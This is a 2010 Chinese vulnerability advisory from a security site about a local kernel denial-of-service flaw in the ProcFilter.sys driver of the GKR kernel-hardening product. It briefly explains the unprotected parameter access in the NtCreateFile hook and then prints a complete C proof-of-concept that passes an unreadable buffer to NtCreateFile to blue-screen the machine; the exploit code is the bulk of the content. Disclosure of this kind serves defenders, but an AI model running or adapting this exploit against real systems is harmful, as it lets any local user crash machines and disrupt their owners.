首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
中嘉华诚内核加固免疫系统单机版1.2.01 ProcFilter.sys 本地内核拒绝服务漏洞
来源:vfocus.net 作者:vfocus 发布时间:2010-08-09  

中嘉华诚内核加固免疫系统GKR系列产品是北京中嘉华诚网络安全公司开发的一款安全防护软件,其内核驱动ProcFilter.sys (编译日期 = 2009.8.7 ,因该产品制作不规范,没有版本信息,因此以驱动编译日期为准) 存在多处本地内核拒绝服务漏洞,任意权限的用户可以构造特殊参数调用系统服务,引发系统崩溃

漏洞细节:
ProcFilter.sys的作者没有内核安全编程常识,没能正确理解内核驱动中缓存处理的安全方法,例如NtCreateFile的钩子中,仅仅在对传入的用户态参数进行Probe时使用了try_except ,在Probe完毕后就在没有SEH保护下进行了参数访问,因此引发了蓝屏


漏洞利用代码:


#include "stdafx.h"
#include "windows.h"
#include "winternl.h"
int main(int argc, char* argv[])
{
printf("GKR ProcFilter.sys <= 2009.8.7 Local D.O.S Vuln POC\n"
   "Press Enter\n");


getchar();
ULONG i ;


for (i = 0x1000 ; i < 0x7fff0000 ; i+=0x1000)
{
   if (IsBadReadPtr((PVOID)i , 1))
   {
    break ;
   }
}
printf("bad page :%08x\n",i);

OBJECT_ATTRIBUTES oba ;
UNICODE_STRING uniname ;

oba.ObjectName = &uniname;
uniname.Length = 0x24 ;
uniname.Buffer = (PWSTR)i;
PVOID proc = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtCreateFile");

__asm
{
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   push 0
   lea eax , oba
   push eax
   push 0x40000102
   push 0
   call proc
}


return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Struts2和Webwork远程命令执行漏
·最新 phpcms 0day(图)
·Windows Win32k.sys 窗口创建漏
·MyPHP Forum SQL注入漏洞
·114啦网址导航建站系统跨站漏洞
·FreeBSD Kernel nfs_mount漏洞分
·dedecms v5.3-v5.6 Get Shell 0d
·dedecms5.3--5.6通杀执行漏洞
·Dedecms <= V5.6 Final模板执行
·Struts2/XWork 安全漏洞及解决办
·FreeBSD Kernel mountnfs() 漏洞
·Microsoft IE 8 toStaticHTML()
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved